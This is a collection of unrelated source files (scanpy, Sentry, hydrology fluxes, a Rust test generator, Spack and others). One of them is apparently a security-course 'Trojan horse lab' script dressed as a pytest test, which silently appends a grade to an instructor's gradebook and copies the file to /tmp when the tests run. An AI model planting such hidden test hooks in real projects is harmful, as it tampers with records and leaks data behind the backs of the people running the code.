n_groups = groups_masks.shape[0]
n_genes = X.shape[1]
means = np.zeros((n_groups, n_genes))
vars = np.zeros((n_groups, n_genes))
ns = np.zeros(n_groups, dtype=int)
for imask, mask in enumerate(groups_masks):
means[imask], vars[imask] = simple._get_mean_var(X[mask])
ns[imask] = np.where(mask)[0].size
logg.info('... consider "{}":'.format(groupby), groups_order,
'with sample numbers', ns)
if group_reference is not None:
ireference = np.where(groups_order == group_reference)[0][0]
# test each either against the union of all other groups
# or against a specific group
rankings_gene_zscores = []
rankings_gene_names = []
reference_indices = np.arange(adata.n_vars, dtype=int)
for igroup in range(n_groups):
if group_reference is None:
mask_rest = ~groups_masks[igroup]
else:
if igroup == ireference: continue
else: mask_rest = groups_masks[ireference]
mean_rest, var_rest = simple._get_mean_var(X[mask_rest])
# Make a more conservative assumption on the variance reduction
# in the reference. Instead of this
ns_rest = np.where(mask_rest)[0].size
# use this
# ns_rest = ns[igroup]
denominator = np.sqrt(vars[igroup]/ns[igroup] + var_rest/ns_rest)
denominator[np.flatnonzero(denominator == 0)] = np.nan
zscores = (means[igroup] - mean_rest) / denominator
zscores[np.isnan(zscores)] = 0
zscores = zscores if only_positive else np.abs(zscores)
partition = np.argpartition(zscores, -n_genes_user)[-n_genes_user:]
partial_indices = np.argsort(zscores[partition])[::-1]
global_indices = reference_indices[partition][partial_indices]
rankings_gene_zscores.append(zscores[global_indices])
rankings_gene_names.append(adata.var_names[global_indices])
if compute_distribution:
mask = groups_masks[igroup]
for gene_counter in range(n_genes_user):
gene_idx = global_indices[gene_counter]
X_col = X[mask, gene_idx]
if issparse(X): X_col = X_col.toarray()[:, 0]
identifier = _build_identifier(groupby, groups_order[igroup],
gene_counter, adata.var_names[gene_idx])
full_col = np.empty(adata.n_smps)
full_col[:] = np.nan
full_col[mask] = (X_col - mean_rest[gene_idx])/denominator[gene_idx]
adata.smp[identifier] = full_col
groups_order_save = groups_order
if group_reference is not None:
groups_order_save = [g for g in groups_order if g != group_reference]
adata.add['rank_genes_groups_gene_scores'] = np.rec.fromarrays(
[n for n in rankings_gene_zscores],
dtype=[(rn, 'float32') for rn in groups_order_save])
adata.add['rank_genes_groups_gene_names'] = np.rec.fromarrays(
[n for n in rankings_gene_names],
dtype=[(rn, 'U50') for rn in groups_order_save])
logg.m(' finished', t=True, end=' ')
logg.m('and added\n'
' "rank_genes_groups_gene_names", np.recarray to be indexed by the `groups` (adata.add)\n'
' "rank_genes_groups_gene_zscores", the scores (adata.add)\n'
' "rank_genes_...", distributions of top-ranked genes (adata.smp)')
return adata if copy else None
def _build_identifier(groupby, name, gene_counter, gene_name):
return 'rank_genes_{}_{}_{}_{}'.format(
groupby, name, gene_counter, gene_name)
| 44.679739 | 104 | 0.655061 | [
"BSD-3-Clause"
] | gioelelm/scanpy | scanpy/tools/rank_genes_groups.py | 6,837 | Python |
from __future__ import absolute_import
from django.dispatch import Signal
from functools import wraps
class BetterSignal(Signal):
def connect(self, receiver=None, **kwargs):
"""
Support decorator syntax:
>>> @signal.connect(sender=type)
>>> def my_receiver(**kwargs):
>>> pass
"""
def wrapped(func):
return super(BetterSignal, self).connect(func, **kwargs)
if receiver is None:
return wrapped
return wraps(receiver)(wrapped(receiver))
regression_signal = BetterSignal(providing_args=["instance"])
buffer_incr_complete = BetterSignal(providing_args=["model", "columns", "extra", "result"])
event_received = BetterSignal(providing_args=["ip"])
| 26.928571 | 91 | 0.657825 | [
"BSD-3-Clause"
] | ChadKillingsworth/sentry | src/sentry/signals.py | 754 | Python |
# Purpose: Calculate hydrological fluxes in the canopy, unsaturated and saturated sub-domains
# Record of revisions:
# Date Programmer Description of change
# ======== ============= =====================
# 09-2020 A. Elkouk Original code
# ----------------------------------------------------------------------------------------------------------------------
# Parametrization for the fluxes in the vegetation canopy
# ----------------------------------------------------------------------------------------------------------------------
def calc_wetted_fraction(canopyStore, canopyStore_max, gamma):
""" Calculate the wetted fraction of the canopy
Parameters
----------
canopyStore : int or float
Canopy Interception storage [mm]
canopyStore_max : int or float
Maximum non-drainable canopy interception storage [mm]
gamma : float
Parameter to account for the non-linearity in the wetted fraction of the canopy
Returns
-------
wetFrac: float
Wetted fraction of the canopy
"""
if canopyStore < canopyStore_max:
wetFrac = (canopyStore / canopyStore_max) ** gamma
else:
wetFrac = 1.0
return wetFrac
def calc_canopy_evaporation(pet, wetFrac):
""" Calculate the evaporation from canopy interception storage
Parameters
----------
pet : int or float
Potential evapotranspiration [mm day^-1]
wetFrac : float
Wetted fraction of the canopy
Returns
-------
canopyEvap: float
Evaporation from canopy interception storage [mm day^-1]
"""
canopyEvap = pet * wetFrac
return canopyEvap
def calc_throughfall_flux(precip, canopyStore, canopyStore_max):
""" Calculate the throughfall flux from canopy interception storage
Parameters
----------
precip : int or float
Precipitation flux [mm day^-1]
canopyStore : int or float
Canopy Interception storage [mm]
canopyStore_max : int or float
Maximum non-drainable canopy interception storage [mm]
Returns
-------
throughfall : int or float
Throughfall flux [mm day^-1]
"""
if canopyStore < canopyStore_max:
throughfall = precip * (canopyStore / canopyStore_max)
else:
throughfall = precip
return throughfall
def calc_canopy_drainage_flux(canopyStore, canopyStore_max, k_can):
""" Calculate the canopy drainage flux from canopy interception storage
Parameters
----------
canopyStore : int or float
Canopy Interception storage [mm]
canopyStore_max : int or float
Maximum non-drainable canopy interception storage [mm]
k_can: float
Canopy drainage coecient [day^-1]
Returns
-------
canopyDrain : int or float
Canopy drainage flux [mm day^-1]
"""
if canopyStore < canopyStore_max:
canopyDrain = 0.0
else:
canopyDrain = k_can * (canopyStore - canopyStore_max)
return canopyDrain
def calc_precipitation_excess(throughfall, canopyDrain):
""" Calculate excess precipitation (the sum of throughfall and canopy drainage)
Parameters
----------
throughfall : int or float
Throughfall flux [mm day^-1]
canopyDrain : int or float
Canopy drainage flux [mm day^-1]
Returns
-------
precipExcess : int or float
Excess precipitation [mm day^-1]
"""
precipExcess = throughfall + canopyDrain
return precipExcess
# ----------------------------------------------------------------------------------------------------------------------
# Parametrization for the fluxes in the unsaturated zone
# ----------------------------------------------------------------------------------------------------------------------
def calc_saturated_fraction(unsatStore, unsatStore_max, alpha):
""" Calculate the saturated fraction of the unsaturated zone
Parameters
----------
unsatStore : int or float
Storage in the unsaturated zone [mm]
unsatStore_max : int or float
Maximum storage in the unsaturated zone [mm]
alpha : float
Parameter to account for the non-linearity in the variable source area for saturation-excess runoff
Returns
-------
satFrac: float
Saturated fraction of the unsaturated zone
"""
if unsatStore < unsatStore_max:
satFrac = 1 - (1 - (unsatStore / unsatStore_max)) ** alpha
else:
satFrac = 1
return satFrac
def calc_unsaturated_evaporation(pet, unsatStore, fieldCap, wetFrac):
""" Calculate evaporation from the unsaturated zone
Parameters
----------
pet : int or float
Potential evapotranspiration [mm day^-1]
unsatStore : int or float
Storage in the unsaturated zone [mm]
fieldCap : int or float
Field capacity [mm]
wetFrac : float
Wetted fraction of the canopy
Returns
-------
unsatEvap : float
Evaporation from the unsaturated zone [mm day^-1]
"""
if unsatStore < fieldCap:
unsatEvap = pet * (unsatStore / fieldCap) * (1 - wetFrac)
else:
unsatEvap = pet * (1 - wetFrac)
return unsatEvap
def calc_overland_flow(precipExcess, satFrac):
""" Calculate overland flow (surface runoff)
Parameters
----------
precipExcess : int or float
Excess precipitation [mm day^-1]
satFrac : float
Saturated fraction of the unsaturated zone
Returns
-------
overlandFlow : float
Overland flow (surface runoff) [mm day^-1]
"""
overlandFlow = precipExcess * satFrac
return overlandFlow
def calc_percolation_flux(unsatStore, unsatStore_max, fieldCap, k_sat, beta):
""" Calculate the percolation flux from the unsaturated to the saturated zone
Parameters
----------
unsatStore : int or float
Storage in the unsaturated zone [mm]
unsatStore_max : int or float
Maximum storage in the unsaturated zone [mm]
fieldCap : int or float
Field capacity [mm]
k_sat : int or float
Maximum percolation rate [mm day^-1]
beta : int or float
Parameter to account for percolation non-linearity
Returns
-------
percolation : int or float
Percolation flux [mm day^-1]
"""
if unsatStore < fieldCap:
percolation = 0.0
else:
percolation = k_sat * ((unsatStore - fieldCap) / (unsatStore_max - fieldCap)) ** beta
return percolation
# ----------------------------------------------------------------------------------------------------------------------
# Parametrization for the fluxes in the saturated zone
# ----------------------------------------------------------------------------------------------------------------------
def calc_baseflow(satStore, k_sz):
""" Calculate baseflow from the saturated zone
Parameters
----------
satStore : int or float
Storage in the saturated zone [mm]
k_sz : float
Runoff coefficient for the saturated zone [day^-1]
Returns
-------
baseflow : float
Baseflow from the saturated zone [mm day^-1]
"""
baseflow = satStore * k_sz
return baseflow
| 28.520913 | 121 | 0.557792 | [
"MIT"
] | aelkouk/rainfall_runoff | flux_param.py | 7,501 | Python |
from django import forms
class SubmitEmbed(forms.Form):
url = forms.URLField() | 20.75 | 30 | 0.746988 | [
"MIT"
] | Tag-Strategies/Tag_Strategies | backend/fec/forms.py | 83 | Python |
########################################################################
#
# Constants
#
########################################################################
RETURN_SUCCESS = 1234 # Requested command executed successfully
RETURN_FAIL = None # Requested command failed | 34.625 | 72 | 0.361011 | [
"BSD-3-Clause"
] | dibondar/PyPhotonicReagents | libs/dev/consts.py | 277 | Python |
#!/usr/bin/env python
#
# Copyright 2013 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
This script creates a pile of compile-fail tests check that all the
derives have spans that point to the fields, rather than the
#[derive(...)] line.
sample usage: src/etc/generate-deriving-span-tests.py
"""
import sys, os, datetime, stat
TEST_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../test/compile-fail'))
YEAR = datetime.datetime.now().year
TEMPLATE = """// Copyright {year} The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-deriving-span-tests.py'
extern crate rand;
{error_deriving}
struct Error;
{code}
fn main() {{}}
"""
ENUM_STRING = """
#[derive({traits})]
enum Enum {{
A(
Error {errors}
)
}}
"""
ENUM_STRUCT_VARIANT_STRING = """
#[derive({traits})]
enum Enum {{
A {{
x: Error {errors}
}}
}}
"""
STRUCT_STRING = """
#[derive({traits})]
struct Struct {{
x: Error {errors}
}}
"""
STRUCT_TUPLE_STRING = """
#[derive({traits})]
struct Struct(
Error {errors}
);
"""
ENUM_TUPLE, ENUM_STRUCT, STRUCT_FIELDS, STRUCT_TUPLE = range(4)
def create_test_case(type, trait, super_traits, number_of_errors):
string = [ENUM_STRING, ENUM_STRUCT_VARIANT_STRING, STRUCT_STRING, STRUCT_TUPLE_STRING][type]
all_traits = ','.join([trait] + super_traits)
super_traits = ','.join(super_traits)
error_deriving = '#[derive(%s)]' % super_traits if super_traits else ''
errors = '\n'.join('//~%s ERROR' % ('^' * n) for n in range(error_count))
code = string.format(traits = all_traits, errors = errors)
return TEMPLATE.format(year = YEAR, error_deriving=error_deriving, code = code)
def write_file(name, string):
test_file = os.path.join(TEST_DIR, 'derives-span-%s.rs' % name)
# set write permission if file exists, so it can be changed
if os.path.exists(test_file):
os.chmod(test_file, stat.S_IWUSR)
with open(test_file, 'wt') as f:
f.write(string)
# mark file read-only
os.chmod(test_file, stat.S_IRUSR|stat.S_IRGRP|stat.S_IROTH)
ENUM = 1
STRUCT = 2
ALL = STRUCT | ENUM
traits = {
'Zero': (STRUCT, [], 1),
'Default': (STRUCT, [], 1),
'FromPrimitive': (0, [], 0), # only works for C-like enums
'Decodable': (0, [], 0), # FIXME: quoting gives horrible spans
'Encodable': (0, [], 0), # FIXME: quoting gives horrible spans
}
for (trait, supers, errs) in [('Clone', [], 1),
('PartialEq', [], 2),
('PartialOrd', ['PartialEq'], 8),
('Eq', ['PartialEq'], 1),
('Ord', ['Eq', 'PartialOrd', 'PartialEq'], 1),
('Debug', [], 1),
('Hash', [], 1)]:
traits[trait] = (ALL, supers, errs)
for (trait, (types, super_traits, error_count)) in traits.items():
mk = lambda ty: create_test_case(ty, trait, super_traits, error_count)
if types & ENUM:
write_file(trait + '-enum', mk(ENUM_TUPLE))
write_file(trait + '-enum-struct-variant', mk(ENUM_STRUCT))
if types & STRUCT:
write_file(trait + '-struct', mk(STRUCT_FIELDS))
write_file(trait + '-tuple-struct', mk(STRUCT_TUPLE))
| 30.38806 | 96 | 0.639244 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | AaronFriel/rust | src/etc/generate-deriving-span-tests.py | 4,072 | Python |
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgwidgetprogress"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osgDB
from osgpypp import osgWidget
# Translated from file 'osgwidgetprogress.cpp'
# -*-c++-*- osgWidget - Code by: Jeremy Moles (cubicool) 2007-2008
# $Id$
#include <osgDB/ReadFile>
#include <osgWidget/Util>
#include <osgWidget/WindowManager>
#include <osgWidget/Canvas>
MASK_2D = 0xF0000000
class UpdateProgressNode (osg.NodeCallback) :
start = float()
done = float()
UpdateProgressNode():
start (0.0),
done (5.0)
virtual void operator()(osg.Node* node, osg.NodeVisitor* nv)
fs = nv.getFrameStamp()
t = fs.getSimulationTime()
if start == 0.0 : start = t
width = ((t - start) / done) * 512.0
percent = (width / 512.0) * 100.0
if width < 1.0 or width > 512.0 : return
window = dynamic_cast<osgWidget.Window*>(node)
if not window : return
w = window.getByName("pMeter")
l = dynamic_cast<osgWidget.Label*>(window.getByName("pLabel"))
if not w or not l : return
w.setWidth(width)
w.setTexCoordRegion(0.0, 0.0, width, 64.0)
ss = std.ostringstream()
ss, osg.round(percent), "% Done"
l.setLabel(ss.str())
def main(argv):
viewer = osgViewer.Viewer()
wm = osgWidget.WindowManager(
viewer,
1280.0,
1024.0,
MASK_2D,
osgWidget.WindowManager.WM_PICK_DEBUG
)
canvas = osgWidget.Canvas("canvas")
pOutline = osgWidget.Widget("pOutline", 512.0, 64.0)
pMeter = osgWidget.Widget("pMeter", 0.0, 64.0)
pLabel = osgWidget.Label("pLabel", "0% Done")
pOutline.setImage("osgWidget/progress-outline.png", True)
pOutline.setLayer(osgWidget.Widget.LAYER_MIDDLE, 2)
pMeter.setImage("osgWidget/progress-meter.png")
pMeter.setColor(0.7, 0.1, 0.1, 0.7)
pMeter.setLayer(osgWidget.Widget.LAYER_MIDDLE, 1)
pLabel.setFont("fonts/VeraMono.ttf")
pLabel.setFontSize(20)
pLabel.setFontColor(1.0, 1.0, 1.0, 1.0)
pLabel.setSize(512.0, 64.0)
pLabel.setLayer(osgWidget.Widget.LAYER_MIDDLE, 3)
canvas.setOrigin(300.0, 300.0)
canvas.addWidget(pMeter, 0.0, 0.0)
canvas.addWidget(pOutline, 0.0, 0.0)
canvas.addWidget(pLabel, 0.0, 0.0)
canvas.getBackground().setColor(0.0, 0.0, 0.0, 0.0)
canvas.setUpdateCallback(UpdateProgressNode())
wm.addChild(canvas)
return osgWidget.createExample(viewer, wm, osgDB.readNodeFile("cow.osgt"))
if __name__ == "__main__":
main(sys.argv)
| 24.724771 | 78 | 0.643043 | [
"BSD-3-Clause"
] | JaneliaSciComp/osgpyplusplus | examples/rough_translated1/osgwidgetprogress.py | 2,695 | Python |
import numpy as np
import cv2
import matplotlib.pyplot as plt
#read image
img = np.array(cv2.imread('1.jpg'))
#this is mask
mask = np.zeros(img.shape[:2],np.uint8)
#this bgdModel and fgdModel is used in background
bgdModel = np.zeros((1,65),np.float64)
fgdModel = np.zeros((1,65),np.float64)
#This is a rectangular cross section of given image where it will search for foreground
rect = (35,30,330,312)
#This is a grabcut func from opencv which is used to detect foreground
cv2.grabCut(img,mask,rect,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_RECT)
mask2 = np.where((mask==2)|(mask==0),0,1).astype('uint8')
img = img*mask2[:,:,np.newaxis]
#here we show our image
plt.imshow(img)
plt.colorbar()
plt.show()
cv2.imshow("sdfg",img)
cv2.waitKey(0)
cv2.imwrite("foreground.jpg",img)
| 26.9 | 88 | 0.708798 | [
"MIT"
] | ultimus11/Foreground-Detection-OpenCV | code/grab_foreground.py | 807 | Python |
#!/usr/bin/env python3
"""
Convert data received from alfred (ffbi format) and serve them as prometheus python client
Typical call::
alfred -r 69 -u /var/run/alfred/alfred.sock > robin.txt
./robin_prometheus.py -m robin.txt
Dependencies:
prometheus_client -> pip3 install prometheus_client
License: CC BY 4.0
Author: Jonas Hess
Strongly Inspired by map-backend of Moritz Warning and Julian Rueth
"""
import sys
import zlib
import re
import datetime
import os
import pickle
import time
import json
import jsonschema
from prometheus_client import start_http_server
from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily, REGISTRY
if sys.version_info[0] < 3:
raise Exception("map-backend.py must be executed with Python 3.")
NOW_TIMESTAMP = datetime.datetime.utcnow().replace(microsecond=0)
class CustomCollector:
"""
Data Collector for serving them in prometheus client
"""
def collect(self):
"""
collectors only function called collect. and it collects data
"""
downstream = GaugeMetricFamily('node_bw_wan_bps', 'last tested wan downstream mb/s', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'downstream_mbps_wan' in node:
downstream.add_metric([node['id']], node['downstream_mbps_wan'])
yield downstream
upstream = GaugeMetricFamily('node_bw_ff_bps', 'last tested ff downstream in mb/s', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'downstream_mbps_ff' in node:
upstream.add_metric([node['id']], node['downstream_mbps_ff'])
yield upstream
ping = GaugeMetricFamily('node_gw_ping_ms', 'last tested gateway ping in ms', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'gw_ping_ms' in node:
ping.add_metric([node['id']], node['gw_ping_ms'])
yield ping
# 'test_host': self.properties['test_host'],
# 'tested_when': self.properties['tested_when'],
rx_counter = CounterMetricFamily('node_rx_bytes', 'received bytes', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'rx_bytes' in node:
rx_counter.add_metric([node['id']], int(node['rx_bytes']))
yield rx_counter
tx_counter = CounterMetricFamily('node_tx_bytes', 'transmitted bytes', labels=['nodeid'])
for node in GLOBAL_NODES['nodes']:
if 'tx_bytes' in node:
tx_counter.add_metric([node['id']], int(node['tx_bytes']))
yield tx_counter
class AlfredParser:
"""
A class providing static methods to parse and validate data reported by
nodes via alfred.
"""
MAC_RE = "^([0-9a-f]{2}:){5}[0-9a-f]{2}$"
MAC_SCHEMA = {"type": "string", "pattern": MAC_RE}
ALFRED_NODE_SCHEMA = {
"type": "object",
"additionalProperties": True,
"properties": {
'downstream_mbps_wan': {"type": "number"},
'downstream_mbps_ff': {"type": "number"},
'gw_ping_ms': {"type": "number"},
'tested_when': {"type": "string", "maxLength": 50},
'rx_bytes': {"type": "number"},
'tx_bytes': {"type": "number"},
},
"definitions": {
"MAC": MAC_SCHEMA,
}
}
@staticmethod
def _parse_string(parse_it):
"""
Strip an escaped string which is enclosed in double quotes and
unescape.
"""
if parse_it[0] != '"' or parse_it[-1] != '"':
raise ValueError("malformatted string: {0:r}".format(parse_it))
return bytes(parse_it[1:-1], 'ascii').decode('unicode-escape')
@staticmethod
def parse_line(item, nodes=None):
"""
Parse and validate a line as returned by alfred.
Such lines consist of a nodes MAC address and an escaped string of JSON
encoded data. Note that most missing fields are populated with
reasonable defaults.
"""
# parse the strange output produced by alfred { MAC, JSON },
if nodes is None:
nodes = {}
if item[-2:] != "}," or item[0] != "{":
raise ValueError("malformatted line: {0}".format(item))
mac, properties = item[1:-2].split(',', 1)
# the first part must be a valid MAC
mac = AlfredParser._parse_string(mac.strip())
jsonschema.validate(mac, AlfredParser.MAC_SCHEMA)
# the second part must conform to ALFRED_NODE_SCHEMA
properties = AlfredParser._parse_string(properties.strip())
if "\x00" in properties:
decompress = zlib.decompressobj(zlib.MAX_WBITS | 32)
# ignores any output beyond 64k (protection from zip bombs)
properties = decompress.decompress(properties.encode('raw-unicode-escape'), 64 * 1024).decode('utf-8')
else:
properties = properties.encode('latin-1').decode('utf8')
properties = json.loads(properties)
jsonschema.validate(properties, AlfredParser.ALFRED_NODE_SCHEMA)
# set some defaults for unspecified fields
properties.setdefault('downstream_mbps_wan', 0)
properties.setdefault('downstream_mbps_ff', 0)
properties.setdefault('rx_bytes', 0)
properties.setdefault('tx_bytes', 0)
if mac in nodes:
# update existing node
node = nodes[mac]
node.update_properties(properties, True)
node.online = True
node.lastseen = NOW_TIMESTAMP
else:
# create a new Node
node = Node(mac, properties, True)
nodes[mac] = node
class Node:
"""
A node in the freifunk network, identified by its primary MAC.
"""
def __init__(self, mac, properties, online):
self.mac = mac
self.properties = properties
if online:
self.lastseen = NOW_TIMESTAMP
self.firstseen = NOW_TIMESTAMP
else:
self.lastseen = None
self.firstseen = None
self.online = online
self.index = None # the index of this node in the list produced for ffmap
self.done = False
def update_properties(self, properties, force=True):
"""
Replace any properties with their respective values in ``properties``.
"""
if force:
# discard all previous properties
self.properties = dict(properties)
if 'force' in self.properties:
del self.properties['force']
else:
# add new key/value pairs only if not already set
for key, value in properties.items():
if key not in self.properties:
if key == "force":
continue
if key == "name":
value = value + "*"
self.properties[key] = value
def nodelist(self):
"""
define/load the nodelist and the properties each single node has
"""
if 'downstream_mbps_wan' not in self.properties:
self.properties['downstream_mbps_wan'] = 0
if 'downstream_mbps_ff' not in self.properties:
self.properties['downstream_mbps_ff'] = 0
obj = {
'id': re.sub('[:]', '', self.mac),
'status': {
'online': self.online,
},
'downstream_mbps_wan': self.properties['downstream_mbps_wan'],
'downstream_mbps_ff': self.properties['downstream_mbps_ff'],
'tested_when': self.properties['tested_when'],
'rx_bytes': self.properties['rx_bytes'],
'tx_bytes': self.properties['tx_bytes'],
}
if 'gw_ping_ms' in self.properties:
obj['gw_ping_ms'] = self.properties['gw_ping_ms']
if self.firstseen:
obj['firstseen'] = self.firstseen.isoformat()
if self.lastseen:
obj['status']['lastcontact'] = self.lastseen.isoformat()
return obj
def render_nodelist(nodes):
"""
render a nodelist out of all nodes found
"""
all_nodes = []
for node in nodes.values():
all_nodes.append(node.nodelist())
return {
"version": "1.0.0",
"updated_at": NOW_TIMESTAMP.isoformat(),
'nodes': all_nodes,
}
def load_nodes(path):
"""
load nodes from storage file
"""
nodes = {}
with open(path, 'rb') as file:
nodes = pickle.load(file)
for node in nodes.values():
# reset old properties
node.online = False
node.index = None
node.clientcount = 0
return nodes
def save_nodes(path, nodes):
"""
save nodes to storage file
"""
with open(path, 'wb') as file:
pickle.dump(nodes, file)
def remove_old_nodes(nodes, delta):
"""
remove nodes older than a certain limit
"""
limit = NOW_TIMESTAMP - delta
old_keys = []
for key, node in nodes.items():
if node.lastseen < limit:
old_keys.append(key)
count = 0
for key in old_keys:
del nodes[key]
count += 1
print("Removed {} old nodes".format(count))
def is_file(path):
"""
just check whether there is a file on given path
"""
return path and os.path.isfile(path)
def main():
"""
main function collecting data from input file/storage and serving prometheus data
"""
import argparse
parser = argparse.ArgumentParser(
description='Convert data received from alfred and provide them as prometheus-service')
parser.add_argument('-m', '--maps', default='robin.txt', help=r'input file containing data collected by alfred')
parser.add_argument('--storage', default='nodes_backup.bin',
help=r'store old data between calls e.g. to remember node lastseen values')
parser.add_argument('-p', '--port', default=8000, help=r'the port this service should listen to')
args = parser.parse_args()
# mac => node
nodes = {}
# load old nodes that we have stored from the last call of this script,
# that way we can show nodes that are offline
if is_file(args.storage):
nodes = load_nodes(args.storage)
remove_old_nodes(nodes, datetime.timedelta(days=7))
try:
with open(args.maps, 'r') as maps:
for line in maps.readlines():
try:
AlfredParser.parse_line(line.strip(), nodes)
except:
import traceback
# debug switch below
print(line)
traceback.print_exc()
continue
nodes_json = render_nodelist(nodes)
except IOError:
exit('File ' + args.maps + ' not accessible')
if args.storage:
save_nodes(args.storage, nodes)
global GLOBAL_NODES
GLOBAL_NODES = nodes_json
global PORT_NUMBER
try:
PORT_NUMBER = int(args.port)
except ValueError:
exit('Error: ' + args.port + ' is not a valid port-number')
if __name__ == '__main__':
main()
REGISTRY.register(CustomCollector())
# Start up the server to expose the metrics.
start_http_server(PORT_NUMBER)
# Generate some requests.
while True:
time.sleep(10)
main()
| 30.545699 | 116 | 0.597201 | [
"MIT"
] | ffbsee/ffbsee-ansible | roles/ffbsee-robin-exporter/files/robin_prometheus.py | 11,363 | Python |
"""
Aaron Harkrider
November 8th, 2018
Build a trojan horse that gains access to a file on cyber.anderson.edu.
The file under attack is the grade book for this assignment.
Sneaky sneaky
"""
import os
def test_mytest():
"""
When Dr. Tarplee run's py.test on the assignment this py file will run and insert my entry into the grade book.
"""
# the entry I want to insert into the grade book
me = "Aaron Harkrider,19\n"
# path to the grade book file on cyber it is /home/kmtarplee2/grades.csv
# Note: to test it in pycharm use Trojan_Horse_Lab/home/kmtarplee2/grades.csv
path = "Trojan_Horse_Lab/home/kmtarplee2/grades.csv"
# Trojan_Horse_Lab / trojan_horse / home / kmtarplee2 / grades.csv
# Boolean to check if I have already inserted my entry into the file to avoid placing a duplicate
complete = True
with open(path, "r") as reading_grades:
if me not in reading_grades.read():
complete = False
# If This is not an entry for me then append my entry to the file
if not complete:
with open(path, "a+") as grades:
grades.write(me)
# piping the cat out from the grade book into a temp file where I can look at it
os.system("cat " + path + " > /tmp/awharkrider_files")
# Standard boilerplate to call the main function, if executed
if __name__ == '__main__':
test_mytest()
| 30.152174 | 115 | 0.688536 | [
"MIT"
] | awharkrider/CPSC_3320_Cybersecurity_Lab | Trojan_Horse_Lab/awharkrider_test.py | 1,387 | Python |
# SPDX-License-Identifier: Apache-2.0
# Copyright 2021 Blue Cheetah Analog Design Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import pybind11_generics_tests.cpp as pyg_test
from pybind11_generics_tests.cpp import Animal, ListHolder, get_list
from .util import do_constructor_test, do_doc_test, do_error_test
class Dog(Animal):
def __init__(self, name):
Animal.__init__(self, name)
def go(self, n_times):
raise NotImplementedError("Not implemented")
class Husky(Dog):
def __init__(self, name):
Dog.__init__(self, name)
def go(self, n_times):
return "woof " * n_times
class ChildList(pyg_test.TestList):
def __init__(self, vec1, vec2):
pyg_test.TestList.__init__(self, vec1)
self._list2 = vec2
def get_data(self):
return self._list2
def get_data_base(self):
return pyg_test.TestList.get_data(self)
test_data = [
(pyg_test.TestList, []),
(pyg_test.TestList, [1, 3, 5, 7, 6]),
(pyg_test.TestList, [2, 4, 8]),
(pyg_test.TestList, [13]),
]
fail_data = [
(pyg_test.TestList, TypeError, [1, 2, 3.5]),
]
doc_data = [
(pyg_test.TestList, "List[int]"),
]
@pytest.mark.parametrize(("cls", "data"), test_data)
def test_constructor(cls, data):
"""Check object is constructed properly."""
do_constructor_test(cls, data)
@pytest.mark.parametrize(("cls", "err", "data"), fail_data)
def test_error(cls, err, data):
"""Check object errors when input has wrong data type."""
do_error_test(cls, err, data)
@pytest.mark.parametrize(("cls", "type_str"), doc_data)
def test_doc(cls, type_str):
"""Check object has correct doc string."""
do_doc_test(cls, type_str)
def test_inheritance():
"""Test inheritance behavior."""
vec1 = [1, 2, 3, 4]
vec2 = [5, 6, 7]
obj = ChildList(vec1, vec2)
assert obj.get_data() == vec2
assert obj.get_data_base() == vec1
assert get_list(obj) == vec1
holder = ListHolder(obj)
obj_ref = holder.get_obj_ref()
obj_ptr = holder.get_obj_ptr()
assert obj_ref is obj
assert obj_ptr is obj
assert isinstance(obj_ref, ChildList)
def test_virtual():
"""Test overriding virtual methods from python."""
prime = Animal("Prime")
dog = Dog("Doggo")
lily = Husky("Lily")
assert prime.go(1) == ""
assert lily.go(2) == "woof woof "
assert prime.command(2) == "Prime: "
assert lily.command(3) == "Lily: woof woof woof "
with pytest.raises(NotImplementedError):
dog.go(3)
with pytest.raises(NotImplementedError):
dog.command(2)
| 25.95 | 74 | 0.674374 | [
"Apache-2.0"
] | bluecheetah/pybind11_generics_tests | tests/test_list.py | 3,114 | Python |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Xsetmode(AutotoolsPackage):
"""Set the mode for an X Input device."""
homepage = "http://cgit.freedesktop.org/xorg/app/xsetmode"
url = "https://www.x.org/archive/individual/app/xsetmode-1.0.0.tar.gz"
